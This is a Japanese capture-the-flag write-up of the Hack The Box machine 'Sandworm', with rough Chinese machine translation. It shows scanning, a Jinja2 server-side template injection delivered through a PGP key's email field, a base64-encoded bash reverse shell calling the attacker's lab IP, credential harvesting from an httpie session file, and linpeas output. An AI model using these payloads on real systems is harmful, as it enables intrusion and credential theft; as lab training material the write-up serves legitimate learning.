【Hack The Box】Sandworm【Writeup】

WriteUp 5个月前 admin
39 0 0

初めに 首先

どうも、クソ雑魚のなんちゃてエンジニアです。 您好,我是一名杂项工程师。
本記事は Hack The Box(以下リンク参照) の「Sandworm」にチャレンジした際の WriteUp になります。
本文是 Hack The Box 中“Sandworm”挑战的文章(见下面的链接)。

※以前までのツールの使い方など詳細を書いたものではないのでご了承ください。
*请注意,到目前为止,我还没有写出如何使用该工具等详细信息。

※悪用するのはやめてください。あくまで社会への貢献のためにこれらの技術を使用してください。法に触れるので。
*请不要滥用它。 我们使用这些技术只是为了为社会做出贡献。 因为它违反了法律。

Discovery 发现

ポートスキャン 端口扫描

今回はRustScanで高速スキャンしてみた。 这一次,我尝试了使用 RustScan 进行高速扫描。

┌──(root㉿kali)-[~]
└─# rustscan -a 10.129.34.190 --top --ulimit 5000
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.129.34.190:22
Open 10.129.34.190:80
Open 10.129.34.190:443
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

[~] Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-19 08:02 EDT
Initiating Ping Scan at 08:02
Scanning 10.129.34.190 [4 ports]
Completed Ping Scan at 08:02, 0.28s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:02
Completed Parallel DNS resolution of 1 host. at 08:02, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 08:02
Scanning 10.129.34.190 [3 ports]
Discovered open port 22/tcp on 10.129.34.190
Discovered open port 80/tcp on 10.129.34.190
Discovered open port 443/tcp on 10.129.34.190
Completed SYN Stealth Scan at 08:02, 0.30s elapsed (3 total ports)
Nmap scan report for 10.129.34.190
Host is up, received echo-reply ttl 63 (0.26s latency).
Scanned at 2023-06-19 08:02:25 EDT for 1s

PORT    STATE SERVICE REASON
22/tcp  open  ssh     syn-ack ttl 63
80/tcp  open  http    syn-ack ttl 63
443/tcp open  https   syn-ack ttl 63

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.73 seconds
           Raw packets sent: 7 (284B) | Rcvd: 4 (160B)

ポート22、80、443が公開されてそう。 端口 22、80 和 443 已公开。
実際に80にアクセスしてみると、「ssa.htb」にアクセスできませんと言われるのでDNSの設定を投入していく。
当我实际访问80时,我被告知无法访问“ssa.htb”,所以我将插入DNS设置。

Collection

ドメイン環境設定 域首选项

今回BOX環境にDNSはないので、自身のkalilinuxで名前解決できるようにする。
由于这次 BOX 环境中没有 DNS,因此可以用自己的 kalilinux 解析名称。

┌──(root💀kali)-[~/work]
└─# vim /etc/hosts   

以下を投入。 加入以下内容。

10.129.34.190    ssa.htb

疎通確認を行う。 确认通信。

┌──(root㉿kali)-[~]
└─# ping ssa.htb         
PING ssa.htb (10.129.34.190) 56(84) bytes of data.
64 bytes from ssa.htb (10.129.34.190): icmp_seq=1 ttl=63 time=261 ms
64 bytes from ssa.htb (10.129.34.190): icmp_seq=2 ttl=63 time=253 ms
64 bytes from ssa.htb (10.129.34.190): icmp_seq=3 ttl=63 time=253 ms
^C
--- ssa.htb ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2003ms
rtt min/avg/max/mdev = 252.597/255.634/260.867/3.715 ms

サイト探索 网站探索

httpサービスが空いていたのでどうせWebに穴があるんだろうなというメタ読みからサイト探索していきます。ちなみにサブドメインは見つかりませんでした。
由于 http 服务是空的,我将从元阅读中探索该网站,无论如何网络上一定有一个漏洞。 顺便说一句,我没有找到任何子域。

ディレクトリ探索 目录浏览

dirsearchを使用して探索を実施。  dirsearch 进行勘探。

┌──(root㉿kali)-[~/work]
└─# dirsearch -u https://ssa.htb/

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/ssa.htb/-_23-06-19_08-08-19.txt

Error Log: /root/.dirsearch/logs/errors-23-06-19_08-08-19.log

Target: https://ssa.htb/

[08:08:20] Starting: 
[08:09:05] 200 -    5KB - /about                                            
[08:09:11] 302 -  227B  - /admin  ->  /login?next=%2Fadmin                  
[08:10:05] 200 -    3KB - /contact                                          
[08:10:38] 200 -    9KB - /guide                                            
[08:11:00] 200 -    4KB - /login                                            
[08:11:02] 302 -  229B  - /logout  ->  /login?next=%2Flogout   

ほう、それじゃffufでも最初の階層を探っておく。
好的,让我们 ffuf 来探索第一关。

┌──(root㉿kali)-[~/work]
└─# ffuf -w directory-list-2.3-small.txt:FUZZ -u https://ssa.htb/FUZZ -t 150                                          

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.0.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : https://ssa.htb/FUZZ
 :: Wordlist         : FUZZ: /root/work/directory-list-2.3-small.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 150
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________

[Status: 200, Size: 8161, Words: 2604, Lines: 124, Duration: 262ms]
    * FUZZ: # directory-list-2.3-small.txt

[Status: 200, Size: 8161, Words: 2604, Lines: 124, Duration: 259ms]
    * FUZZ: # Attribution-Share Alike 3.0 License. To view a copy of this

[Status: 200, Size: 8161, Words: 2604, Lines: 124, Duration: 265ms]
    * FUZZ: #

[Status: 200, Size: 8161, Words: 2604, Lines: 124, Duration: 269ms]
    * FUZZ: # Priority-ordered case-sensitive list, where entries were found

[Status: 200, Size: 8161, Words: 2604, Lines: 124, Duration: 270ms]
    * FUZZ: 

[Status: 200, Size: 8161, Words: 2604, Lines: 124, Duration: 270ms]
    * FUZZ: # or send a letter to Creative Commons, 171 Second Street,

[Status: 200, Size: 8161, Words: 2604, Lines: 124, Duration: 270ms]
    * FUZZ: # license, visit http://creativecommons.org/licenses/by-sa/3.0/

[Status: 200, Size: 8161, Words: 2604, Lines: 124, Duration: 275ms]
    * FUZZ: # This work is licensed under the Creative Commons

[Status: 200, Size: 8161, Words: 2604, Lines: 124, Duration: 271ms]
    * FUZZ: # Suite 300, San Francisco, California, 94105, USA.

[Status: 200, Size: 8161, Words: 2604, Lines: 124, Duration: 276ms]
    * FUZZ: # on at least 3 different hosts

[Status: 200, Size: 8161, Words: 2604, Lines: 124, Duration: 281ms]
    * FUZZ: #

[Status: 200, Size: 5584, Words: 1147, Lines: 77, Duration: 269ms]
    * FUZZ: about

[Status: 200, Size: 4392, Words: 1374, Lines: 83, Duration: 310ms]
    * FUZZ: login

[Status: 200, Size: 3543, Words: 772, Lines: 69, Duration: 318ms]
    * FUZZ: contact

[Status: 200, Size: 8161, Words: 2604, Lines: 124, Duration: 331ms]
    * FUZZ: #

[Status: 200, Size: 8161, Words: 2604, Lines: 124, Duration: 343ms]
    * FUZZ: # Copyright 2007 James Fisher

[Status: 200, Size: 8161, Words: 2604, Lines: 124, Duration: 337ms]
    * FUZZ: #

[Status: 302, Size: 225, Words: 18, Lines: 6, Duration: 355ms]
    * FUZZ: view

[Status: 302, Size: 227, Words: 18, Lines: 6, Duration: 276ms]
    * FUZZ: admin

[Status: 200, Size: 9043, Words: 1771, Lines: 155, Duration: 270ms]
    * FUZZ: guide

[Status: 200, Size: 3187, Words: 9, Lines: 54, Duration: 266ms]
    * FUZZ: pgp

[Status: 302, Size: 229, Words: 18, Lines: 6, Duration: 270ms]
    * FUZZ: logout

[Status: 405, Size: 153, Words: 16, Lines: 6, Duration: 345ms]
    * FUZZ: process

[Status: 200, Size: 8161, Words: 2604, Lines: 124, Duration: 430ms]
    * FUZZ: 

:: Progress: [87664/87664] :: Job [1/1] :: 307 req/sec :: Duration: [0:04:48] :: Errors: 0 ::

似たような結果だがpgpの階層などはdirsearchでは見えなかったものだ。
pgp 类似的结果,但层次结构在 dirsearch 中是不可见的。

実際に気になる階層にアクセスしてみる。  尝试访问您真正感兴趣的层次结构。
/loginの階層。  /login 的层次结构。
【Hack The Box】Sandworm【Writeup】
/guideの階層。  /guide 的层次结构。
【Hack The Box】Sandworm【Writeup】
/pgpの階層。  /pgp 的层次结构。
【Hack The Box】Sandworm【Writeup】
ほうほう。色々とやりがいがありそうなサイトですね。
方法。 这是一个似乎在很多方面都有回报的网站。

動作確認 动作确认

/guideに色々Post出来そうな機能があるので試してみる。
/guide 可以发布各种功能,所以请尝试一下。

※大方PGPの動作を再現するようなPageに見えるが…
* 它看起来像一个大部分再现 PGP 操作的页面,但是……

/pgp階層で見えた公開鍵を入れる。  /pgp 输入您在层次结构中看到的公钥。
【Hack The Box】Sandworm【Writeup】
ほう、おそらく暗号化したmessageが出てきた。
嗯,我收到了一条大概加密的消息。

これを上の暗号化テキストの欄に貼って復号化してみる。
将其粘贴到上面的密文字段中并尝试解密它。

【Hack The Box】Sandworm【Writeup】
あー出てきた!!!やはりPGPの動作をしているみたいに見える。
啊,它出来了!! 毕竟,看起来 PGP 正在工作。

しかし、このメッセージは下部で見たな。。。  但是,我在底部看到了这条消息。
【Hack The Box】Sandworm【Writeup】
これは署名されているメッセージぽいので、検証の動作をしそうな3段目の機能を試してみる。
这看起来像是一条签名的消息,所以我将尝试似乎适用于验证的第三阶段函数。

【Hack The Box】Sandworm【Writeup】
署名の検証がOKであることのメッセージがポップアップされた。
弹出一条消息,指出签名验证正常。

なるほど。署名検証の機能まであるのか。  明白了。 它甚至有签名验证功能吗?

じゃ、ここら辺の機能を使ってExploit実施します。
然后,让我们使用这些函数来实现漏洞利用。

Initial Access

SSTI

パッと思いつくものだと、入力値をサイトに出力してくれるのでSSTIの脆弱性が思いつく。
如果你想到的东西,它会将输入值输出到站点,所以你可以想到SSTI漏洞。

以下のサイトでSSTIのPayloadをこのサイトの公開鍵で暗号化してみて、それを復号化機能を使って表示してみる。
尝试在以下站点上使用此站点的公钥加密 SSTI 有效负载,并使用解密功能显示它。

【Hack The Box】Sandworm【Writeup】
だめか、続いて!!  不,继续!!
【Hack The Box】Sandworm【Writeup】
FlaskなのでこっちのJinja2が本命だったのだが、通らなかった。別手段を検討しようと思う。
由于是 Flask,所以这款 Jinja 2 是最受欢迎的,但它没有通过。 我要考虑另一种方式。

Exploit検討 Exploit検讨

Verify Signed Message

この機能は入力値が2つあるので、色々出来そうな気がする。
这个函数有两个输入值,所以我觉得它可以通过多种方式完成。

Burpで詳細を確認しておく。  使用打嗝检查详细信息。
【Hack The Box】Sandworm【Writeup】
こんな感じでリクエストとレスポンスが帰ってきてJSでPOPさせているみたいだ。
似乎请求和响应是这样的,并且是带有JS的POP。

ここでレスポンスのピンクの文字列に注目する。PGPの鍵生成の時にはそういえばUser名とEmailを指定する必要があり、それが出力されているように見受けられる。
请注意响应中的粉红色字符串。 生成PGP密钥时,需要指定用户名和Email,似乎是输出的。

であればこちらで鍵を生成して、署名したメッセージを送信すれば…
如果是这样,您可以在此处生成密钥并发送签名消息…

鍵生成の時に指定したEmailにSSTIのPayloadを混ぜたら発火するのでは?と考える。
如果我将 SSTI Payload 与密钥生成时指定的电子邮件混合在一起,它不会着火吗? 想。

このPGPの鍵生成、署名の流れが面倒そうだったのでToolを作成することとする。
由于此 PGP 的密钥生成和签名流程似乎很麻烦,因此我决定创建一个工具。

Create Tool – pygp

0から作るのはとても面倒だったのでChatGPTさんにお願いした。
从头开始制作非常麻烦,所以我让 ChatGPT 来做。

※本当にいつもお世話になっております。  * 我真的总是感激你。

鍵生成をPythonコードで作ってもらったものが以下です。
以下是我要求使用 Python 代码创建密钥生成的内容。

【Hack The Box】Sandworm【Writeup】
これを動くように微調整したコードが以下のものになります。
为实现此工作而微调的代码如下。

keygen.py
import argparse
import gnupg

def generate_keypair(gpg, name, email, passphrase):
    input_data = gpg.gen_key_input(
        key_type="RSA",
        key_length=2048,
        name_real=name,
        name_email=email,
        passphrase=passphrase
    )
    key = gpg.gen_key(input_data)
    return key

def save_keys(gpg, public_key_file, private_key_file, key, passphrase):
    public_key = gpg.export_keys(key.fingerprint)
    private_key = gpg.export_keys(key.fingerprint, secret=True, passphrase=passphrase)

    with open(public_key_file, "w") as f:
        f.write(public_key)

    with open(private_key_file, "w") as f:
        f.write(private_key)

def main():
    parser = argparse.ArgumentParser(description="PGP key pair generator")
    parser.add_argument("-n", "--name", dest="name", type=str, required=True, help="Name for the key owner")
    parser.add_argument("-e", "--email", dest="email", type=str, required=True, help="Email address for the key owner")
    parser.add_argument("-p", "--passphrase", dest="passphrase", type=str, required=True, help="Passphrase to protect the private key")
    parser.add_argument("--public-key-file", default="public_key.asc", help="Output file for the public key")
    parser.add_argument("--private-key-file", default="private_key.asc", help="Output file for the private key")
    args = parser.parse_args()

    gpg = gnupg.GPG()
    key = generate_keypair(gpg, args.name, args.email, args.passphrase)
    save_keys(gpg, args.public_key_file, args.private_key_file, key, args.passphrase)

    print("Key pair generated successfully!")
    print(f"Public key saved to: {args.public_key_file}")
    print(f"Private key saved to: {args.private_key_file}")

if __name__ == "__main__":
    main()

同様に署名を行うPythonファイルを以下に作成しました。
我在下面创建了一个执行相同签名的 Python 文件。

sign.py
import argparse
import gnupg

def sign_message(message, private_key_file, passphrase):
    gpg = gnupg.GPG()
    with open(private_key_file, "r") as f:
        key_data = f.read()
        import_result = gpg.import_keys(key_data)
        
    private_key = import_result.results[0]['fingerprint']

    signed_data = gpg.sign(message, keyid=private_key, passphrase=passphrase)
    return signed_data

def main():
    parser = argparse.ArgumentParser(description="PGP message signer")
    parser.add_argument("-m", "--message", type=str, required=True, help="Message to sign")
    parser.add_argument("-r", "--private-key-file", type=str, required=True, help="Private key file")
    parser.add_argument("-p", "--passphrase", type=str, required=True, help="Passphrase for the private key")
    args = parser.parse_args()

    message = args.message
    private_key_file = args.private_key_file
    passphrase = args.passphrase

    signed_data = sign_message(message, private_key_file, passphrase)

    if signed_data.status == "signature created":
        print("Message signed successfully!")
        print("Signed message:")
        print(signed_data.data.decode('utf-8'))
    else:
        print("Failed to sign the message. Error message:")
        print(signed_data.status)

if __name__ == "__main__":
    main()

後はここら辺をじどうで回してくれるシェルを以下のように組みました。
在那之后,我组装了一个外壳,可以在这里和那里转动,如下所示。

sandwarm.sh
#!/bin/bash
# Please run with arg1st is string. exp: ./sandworm "test"

python3 keygen.py -n "taksec" -e "$1" -p aaa --public-key-file public.pem --private-key-file private.pem
python3 sign.py -m "test taksec message" --private-key-file private.pem -p aaa
cat public.pem

ここら辺のToolを色々とまとめたので、以下のGithubで公開してます。
我在这里总结了各种工具,所以我将它们发布在下面的 Github 上。

さて、色々とToolの準備が整ったので回していきます。
现在工具已经准备好了,让我们把它转过来。

pygp – SSTI

上記で作成したToolでExploitを実行していきます。
我们将使用上面创建的工具执行该漏洞利用。

まずは{{7*7}}で脆弱性が存在するか確認します。
首先,检查 {{7*7}} 中是否存在漏洞。

【Hack The Box】Sandworm【Writeup】
ブラウザではわかりにくいのでBurpでも確認します。
在浏览器中很难看到,所以我也会用 Burp 检查它。

【Hack The Box】Sandworm【Writeup】
さっきと同様にピンクの部分を確認すると、49で脆弱性が発露していることが分かります。
如果像以前一样检查粉红色部分,可以看到 49 漏洞暴露了。

続いてOS cmd Injectionが発火するか試します。
接下来,尝试查看 OS cmd 注入是否触发。

以下のサイトからペイロードを拝借します。  我们将从以下站点借用有效载荷。

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}
Jinja2のこいつを叩き込みます。  我要打这个来自 Jinja2 的家伙。
【Hack The Box】Sandworm【Writeup】
【Hack The Box】Sandworm【Writeup】
idコマンドが打てていることが分かります。OS cmd Injectionが出来そうなのでリバースシェルを実行できそうですね!!
id 您可以看到正在键入命令。 似乎可以完成OS cmd注入,因此似乎可以执行反向shell! !!

Reverse Shell

リバースシェルを叩き込みます。いつもの以下のサイトを利用する。
击中反向外壳。 像往常一样使用以下网站。

リバースシェル確立のために受け側を用意しておく。
准备接收器以建立反向外壳。

┌──(root💀kali)-[~/work]
└─# nc -lnvp 4444           
listening on [any] 4444 ...

ここから数時間経過…とても苦労した。ほぼすべてのPayloadを試してもリバースシェルが帰ってこないのです。諦めかけてました。
从那时起已经过去了几个小时…… 这是非常困难的。 我已经尝试了几乎所有的有效载荷,但仍然无法取回反向外壳。 我几乎放弃了。

※これToolがなかったらもう疲れ果ててタ氏してました…
* 如果不是这个工具,我会筋疲力尽……

そこで打てるコマンドを先に探ることにしました。lsコマンドを打てることが分かっていたので、ls -l /usr/binなどを確認してみると、bashpython3shbase64idlsgpgなどのコマンドが打てそうなことがわかりましたが、bashはすでに試しており、、、
因此,我决定探索可以首先点击的命令。 ls 我知道我可以输入命令,所以当我检查 等 ls -l /usr/bin 时,我发现我可以点击 、 等命令 gpg 、、、, , bash python3 sh base64 id ls bash

そこで、WAFなどでBlockされていることも考慮し、base64でエンコードしてBOXで実行コマンドをデコードしてもらう事を考えました。エンコードについては以下のサイトが役に立ちます。
因此,考虑到它被WAF等阻塞,我们想到了用base64编码,用BOX解码执行命令。 以下网站可用于编码:

出来上がったPayloadは以下です。 生成的有效负载如下:

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xMTQvNDQ0NCAwPiYx | base64 -d | bash').read() }}

これをさっきのToolに食わせて試します。 我将通过将它提供给以前的工具来尝试这一点。
【Hack The Box】Sandworm【Writeup】
【Hack The Box】Sandworm【Writeup】
帰ってきました!!!  我回来了!!

…これでまだUserフラグも取れてないとは驚きである。
… 令人惊讶的是,用户标志尚未被删除。

Credential Access

Python one liner

さて、ここらでシェルの中身を見てみると、curlwgetもない、使えるものがほぼないシェルだった。
现在,当我在这里查看贝壳的内容时, curl wget 它是一个几乎没有任何东西可以使用的贝壳。

恐らくLinuxのnamespaceで封じ込められているシェルだと考えるのが無難だ。
可以肯定的是,它是一个可能包含在 Linux 命名空间中的 shell。

Collectionのための列挙も碌にできない状況だった。
无法列举该集合。

ただ忘れてはならない…僕達には Python という強大な味方がいることを…
只是别忘了…… 我们知道我们有一个强大的盟友,Python……

そう、人類は思い出したのだ… 是的,人类记得……

Python の威厳を… Python的威严…

(ほんと何もできそうもなくて、BlackHat Python状況でした!)
(我真的不认为我能做任何事情,这是 BlackHat Python 的情况! )

以下のワンライナーのPython列挙コマンドを使用する。
使用以下单行 Python 枚举命令:

python3 -c "import glob; print([p for p in glob.glob('/home/atlas/.*/**/*', recursive=True)])"

/home/atlas/.*/**/*に気になるキーワードをセットして列挙するだけである。
/home/atlas/.*/**/* 您所要做的就是设置您感兴趣的关键字并枚举它们。

confとかrootとかadminとかここら辺を調べればそれっぽいものが列挙される。
conf root 如果你环顾四 admin 周 这里 ,你会发现类似的东西列表。

ここら辺の思考は以下のオライリーの書籍が役に立つ。
O’Reilly的书对思考这个问题很有用。

enumerate 結果

以下で気になったものが出てきた。 以下是我的兴趣所在。

atlas@sandworm:~$ python3 -c "import glob; print([p for p in glob.glob('/home/atlas/.*/**/*admin*', recursive=True)])"
<lob('/home/atlas/.*/**/*admin*', recursive=True)])"
['/home/atlas/.config/httpie/sessions/localhost_5000/admin.json']
atlas@sandworm:~$ 

/home/atlas/.config/httpie/sessions/localhost_5000/admin.jsonだと!このファイルを調べてみる。
/home/atlas/.config/httpie/sessions/localhost_5000/admin.json 就是这样! 让我们检查一下这个文件。

【Hack The Box】Sandworm【Writeup】
あ、クレデンシャルが記載されている!  哦,凭据已列出!
このクレデンシャルでログインしてみる。  尝试使用这些凭据登录。
【Hack The Box】Sandworm【Writeup】
ログイン成功!!  登录成功!!
これでやっとUserフラグゲットだぜ!  现在你终于得到了用户标志!

Privilege Escalation – Horizontal

情報収集 情报収集

sudo -l

とりあえずsudo -lで特権で使えそうなファイルやコマンドを探してみる。
目前 sudo -l ,我将尝试找到一个我可以以权限使用的文件或命令。

silentobserver@sandworm:~$ sudo -l
[sudo] password for silentobserver: 
Sorry, user silentobserver may not run sudo on localhost.
silentobserver@sandworm:~$ 

何もない… 无。。。

linpeas 林皮亚斯

ということでlinpeas使います。 这就是我要使用 linpeas 的原因。
以下のサイトからlinpeas.shをダウンロードしてくる。
从以下网站下载 linpeas.sh。

┌──(root㉿kali)-[~/work]
└─# wget https://github.com/carlospolop/PEASS-ng/releases/download/20230312/linpeas.sh

実行。

silentobserver@sandworm:/tmp$ chmod +x linpeas.sh 
silentobserver@sandworm:/tmp$ ./linpeas.sh 


                            ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
                    ▄▄▄▄▄▄▄             ▄▄▄▄▄▄▄▄
             ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄
         ▄▄▄▄     ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄
         ▄    ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄       ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄          ▄▄▄▄▄▄               ▄▄▄▄▄▄ ▄
         ▄▄▄▄▄▄              ▄▄▄▄▄▄▄▄                 ▄▄▄▄ 
         ▄▄                  ▄▄▄ ▄▄▄▄▄                  ▄▄▄
         ▄▄                ▄▄▄▄▄▄▄▄▄▄▄▄                  ▄▄
         ▄            ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄   ▄▄
         ▄      ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄                                ▄▄▄▄
         ▄▄▄▄▄  ▄▄▄▄▄                       ▄▄▄▄▄▄     ▄▄▄▄
         ▄▄▄▄   ▄▄▄▄▄                       ▄▄▄▄▄      ▄ ▄▄
         ▄▄▄▄▄  ▄▄▄▄▄        ▄▄▄▄▄▄▄        ▄▄▄▄▄     ▄▄▄▄▄
         ▄▄▄▄▄▄  ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄   ▄▄▄▄▄ 
          ▄▄▄▄▄▄▄▄▄▄▄▄▄▄        ▄          ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ 
         ▄▄▄▄▄▄▄▄▄▄▄▄▄                       ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄                         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄            ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
          ▀▀▄▄▄   ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀
               ▀▀▀▄▄▄▄▄      ▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▀▀
                     ▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀

    /---------------------------------------------------------------------------------\
    |                             Do you like PEASS?                                  |                                                                     
    |---------------------------------------------------------------------------------|                                                                     
    |         Get the latest version    :     https://github.com/sponsors/carlospolop |                                                                     
    |         Follow on Twitter         :     @hacktricks_live                          |                                                                   
    |         Respect on HTB            :     SirBroccoli                             |                                                                     
    |---------------------------------------------------------------------------------|                                                                     
    |                                 Thank you!                                      |                                                                     
    \---------------------------------------------------------------------------------/                                                                     
          linpeas-ng by carlospolop                                                                                                                         
                                                                                                                                                            
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.          '                                                                                                                       
...省略


╔══════════╣ All users & groups
uid=0(root) gid=0(root) groups=0(root)                                                                                                                      
uid=1000(atlas) gid=1000(atlas) groups=1000(atlas),1002(jailer)
uid=1001(silentobserver) gid=1001(silentobserver) groups=1001(silentobserver)
uid=100(systemd-network) gid=102(systemd-network) groups=102(systemd-network)
uid=101(systemd-resolve) gid=103(systemd-resolve) groups=103(systemd-resolve)
uid=102(systemd-timesync) gid=104(systemd-timesync) groups=104(systemd-timesync)
uid=103(messagebus) gid=106(messagebus) groups=106(messagebus)
uid=104(syslog) gid=110(syslog) groups=110(syslog),4(adm),5(tty)
uid=105(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=106(tss) gid=111(tss) groups=111(tss)
uid=107(uuidd) gid=112(uuidd) groups=112(uuidd)
uid=108(tcpdump) gid=113(tcpdump) groups=113(tcpdump)
uid=109(landscape) gid=115(landscape) groups=115(landscape)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=110(pollinate) gid=1(daemon[0m) groups=1(daemon[0m)
uid=111(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=112(usbmux) gid=46(plugdev) groups=46(plugdev)
uid=113(fwupd-refresh) gid=118(fwupd-refresh) groups=118(fwupd-refresh)
uid=114(mysql) gid=120(mysql) groups=120(mysql)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=1(daemon[0m) gid=1(daemon[0m) groups=1(daemon[0m)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=997(_laurel) gid=997(_laurel) groups=997(_laurel)
uid=998(lxd) gid=100(users) groups=100(users)
uid=999(systemd-coredump) gid=999(systemd-coredump) groups=999(systemd-coredump)
uid=9(news) gid=9(news) groups=9(news)

...省略


╔══════════╣ Analyzing Other Interesting Files (limit 70)
-rw-r--r-- 1 root root 3771 Feb 25  2020 /etc/skel/.bashrc                                                                                                  
-rw-r--r-- 1 atlas atlas 3771 Nov 22  2022 /home/atlas/.bashrc
-rw-r--r-- 1 silentobserver silentobserver 3771 Nov 22  2022 /home/silentobserver/.bashrc





-rw-r--r-- 1 root root 807 Feb 25  2020 /etc/skel/.profile
-rw-r--r-- 1 atlas atlas 807 Nov 22  2022 /home/atlas/.profile
-rw-r--r-- 1 silentobserver silentobserver 807 Nov 22  2022 /home/silentobserver/.profile
-rw-r--r-- 1 root root 713 Nov 29  2022 /usr/local/etc/firejail/1password.profile
-rw-r--r-- 1 root root 1265 Nov 29  2022 /usr/local/etc/firejail/gnome-passwordsafe.profile






                      ╔════════════════════════════════════╗
══════════════════════╣ Files with Interesting Permissions ╠══════════════════════                                                                          
                      ╚════════════════════════════════════╝                                                                                                
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid                                                                            
-rwsrwxr-x 2 atlas atlas 57M Jun  6 10:00 /opt/tipnet/target/debug/tipnet (Unknown SUID binary!)                                                            
-rwsrwxr-x 1 atlas atlas 54M May  4 18:06 /opt/tipnet/target/debug/deps/tipnet-a859bd054535b3c1 (Unknown SUID binary!)
-rwsrwxr-x 2 atlas atlas 57M Jun  6 10:00 /opt/tipnet/target/debug/deps/tipnet-dabc93f7704f7b48 (Unknown SUID binary!)
-rwsr-x--- 1 root jailer 1.7M Nov 29  2022 /usr/local/bin/firejail (Unknown SUID binary!)
-rwsr-xr-- 1 root messagebus 35K Oct 25  2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 331K Nov 23  2022 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 19K Feb 26  2022 /usr/libexec/polkit-agent-helper-1
-rwsr-xr-x 1 root root 47K Feb 21  2022 /usr/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 227K Apr  3 18:00 /usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 71K Nov 24  2022 /usr/bin/gpasswd
